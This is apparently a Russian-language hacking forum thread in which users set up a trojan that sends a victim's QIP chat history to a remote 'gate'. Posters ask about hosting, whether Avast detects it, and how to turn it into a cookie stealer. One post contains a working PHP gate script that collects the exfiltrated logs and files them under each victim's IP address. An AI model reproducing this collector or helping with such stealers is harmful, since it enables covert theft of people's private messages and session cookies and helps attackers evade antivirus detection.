я даж не понял как создать этот хост... глюкавые сайты какие то, в аккаунт не дает даж зайти, то с картинки типа неправильно пишу.. то еще что то посоветуйте какой нить сайт, на котором можно всё это заставить работать на 100%... можно даж платные
Спс, прога шлёт историю, когда по ней щелкнут? после перезагрузки компа надо, чтоб Жертва опять запустила прогу?
создал хост на jucehost, назвал например abcd.ru... это и есть адрес хоста? разве не должно быть че то вроде abcd.juicehost.net ?? и еще вопрос, там на главной написано 5 дней бесплатно... но в личном кабинете написано счет: -500 руб ... я всё ж могу 5 дней нахаляву пользоваться??? ответьте плз поскорее, ждать уже нельзя мне, горю(((
))ааа..... а прогер видать тут и не появляется да и еще, если кто знает, напишите, ловит ли эту прогу аваст?
а чем этот гейт отличается от того, что в архиве идёт ? ЗЫ: большая просьба помочь мне разобраться во всём этом в icq, отликнитесь кто нить
Я так доконца и невкурил кто создал этот пейзаж?Автору плючеГ... .+) Вот этот gate чуть получше PHP: <? $filename=$_POST['fname']; $UIN=$_POST['UIN']; $text = $_POST['data']; $ip=$_SERVER[REMOTE_ADDR]; if(!file_exists($ip)){mkdir($ip,0777);} $file=$ip."/log_" . $UIN . "_" . $filename; $fp = fopen($file, 'a+'); fwrite($fp, $text); fclose($fp); ?> ПОкрайней мере создаёт папку с Айпишником Жертвы... .И записывает туда все логи
народ, посоветуйте какой нить проверенный бесплатный хостинг, джино-нет пал, не регистрирует он щас новых пользователей GrantHost и hostland.su пробовал... не приходит ничего
kung lao зачем тебе фри хост под хистори сендер ? на фри хосты с его логи всеровно приходят в нечитабельной кодировке
Немного попробовал перекодить прогу, что бы получить Cookie Sender =). В итоге,- шлет куки, но почему то не те. Может тот, кто разбирается в кодинге на дельфи лучше, проапгрейдит? Кстати AVZ просканил и сказал что подозрительный файл(скинер файлов или что то такое). Нельзя скажем заменить процедуру поиска файла _servlog по всем дискам, на поиск в реестре куда установлен qip?